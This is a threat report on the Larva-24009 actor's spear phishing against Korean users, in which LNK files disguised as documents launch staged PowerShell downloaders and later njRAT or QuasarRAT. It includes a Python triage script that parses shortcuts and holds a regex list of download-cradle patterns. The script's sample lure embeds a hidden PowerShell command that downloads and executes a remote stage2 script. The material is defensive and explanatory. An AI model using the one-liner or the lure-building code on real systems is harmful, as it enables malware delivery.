Larva-24009 Threat Actor’s Spear Phishing Attack Case Report
AhnLab SEcurity intelligence Center (ASEC) recently confirmed that the Larva-24009 threat actor is carrying out spear phishing attacks against Korean users. The threat actor has been active since around 2023 and has primarily used spear phishing against users worldwide; recently, however, infections targeting Korean users have also been confirmed.
Little is known about the attacker. The cases identified so far involve the blockchain, music, and healthcare industries, but details about the specific targets are scarce.
The Larva-24009 threat actor begins with spear phishing emails that deliver LNK malware and ultimately installs malware for information theft and remote control. To maintain persistence on, and control of, infected systems, the threat actor is known to use custom-built PowerShell malware.
The attacker appears to use spear phishing for initial access. The email attachment is a compressed file containing image or document files together with a malicious LNK file disguised as one of them (see Figure 1). When the user opens the LNK file, expecting a document, it executes malicious PowerShell commands.

Figure 1. Disguised documents, image files, and LNK malware within the compressed file
One characteristic of the Larva-24009 threat actor is that they create and use a variety of PowerShell scripts. The scripts are executed sequentially in several stages, and most of them serve to download additional payloads or to execute commands that were downloaded.
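The two stages described above (a shortcut posing as a document, and a PowerShell command line that fetches the next stage) can be triaged without running anything: the .lnk file stores its target and arguments in the StringData section of the MS-SHLLINK format. The following is an added example, not ASEC's code or anything recovered from the actor's samples. It parses just enough of the format to reach StringData and scores the command line with generic download-cradle heuristics; the sample shortcut, its paths and the `example.invalid` URL are constructed for the demo and are not indicators from the report.

```python
"""Triage a Windows shortcut (.lnk) for the LNK-to-PowerShell dropper pattern.

Added example, not ASEC's code. Implements the parts of MS-SHLLINK needed to
reach StringData (target and arguments). Samples and URL are constructed.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # frequently set by malicious LNKs to hide the console

# StringData members in the order the format stores them.
STRING_FIELDS = (
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Generic heuristics (regex, finding) applied to "relative_path arguments".
CRADLE_PATTERNS = (
    (r"powershell|pwsh", "invokes PowerShell"),
    (r"-(?:w|win|windowstyle)\s+hidden", "hidden window"),
    (r"-(?:e|ec|enc|encodedcommand)\b", "Base64-encoded command"),
    (r"-(?:ep|exec|executionpolicy)\s+bypass", "execution-policy bypass"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|\bcurl\b",
     "downloads a further stage"),
    (r"\biex\b|invoke-expression", "executes downloaded text"),
    (r"https?://", "URL in arguments"),
)


def build_lnk(relative_path=None, arguments=None, show_command=1):
    """Construct a minimal Unicode .lnk (test data only; no IDList/LinkInfo)."""
    flags, strings = IS_UNICODE, {}
    if relative_path is not None:
        flags |= HAS_RELATIVE_PATH
        strings["relative_path"] = relative_path
    if arguments is not None:
        flags |= HAS_ARGUMENTS
        strings["arguments"] = arguments
    # ShellLinkHeader: size, CLSID, flags, attrs, 3 FILETIMEs, size, icon,
    # ShowCommand, HotKey, Reserved1/2/3 (76 bytes).
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(
        struct.pack("<H", len(strings[name])) + strings[name].encode("utf-16-le")
        for flag, name in STRING_FIELDS if flags & flag)
    return header + body + b"\x00\x00\x00\x00"  # ExtraData terminal block


def parse_lnk(data):
    """Return the header ShowCommand plus whatever StringData the link carries."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize includes itself
        off += struct.unpack_from("<I", data, off)[0]
    for flag, name in STRING_FIELDS:         # CountCharacters + chars, no NUL
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[name] = data[off:off + count].decode("cp1252", "replace")
            off += count
    return fields


def triage_lnk(data):
    """Parse the link and list the reasons it looks like a PowerShell dropper."""
    fields = parse_lnk(data)
    haystack = " ".join(fields.get(k, "") for k in ("relative_path", "arguments"))
    findings = [why for rx, why in CRADLE_PATTERNS if re.search(rx, haystack, re.I)]
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window starts minimised (SW_SHOWMINNOACTIVE)")
    return {"fields": fields, "findings": findings, "suspicious": len(findings) >= 3}


# Constructed samples: a lure that launches a download cradle, and a plain document link.
MALICIOUS_LNK = build_lnk(
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments="-w hidden -nop -ep bypass -c \"iex (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/stage2.ps1')\"",
    show_command=SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk(relative_path=r"..\Documents\quarterly_report.docx")

if __name__ == "__main__":
    for label, blob in (("lure", MALICIOUS_LNK), ("document", BENIGN_LNK)):
        result = triage_lnk(blob)
        print(label, result["suspicious"], result["findings"])
```

Real shortcuts from an attachment usually carry a LinkTargetIDList and LinkInfo, which the parser skips by their declared sizes, so the same `triage_lnk` works on them; the threshold of three findings is a starting point, and a lone `-enc` argument on a shortcut that claims to be a document deserves a look regardless of score.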
Although the malware strains described above allow remote control on their own, the threat actor also controls infected systems with off-the-shelf remote-access tools. They originally used njRAT but have recently switched to QuasarRAT.

Figure 2. UltraVNC server installed on the infected system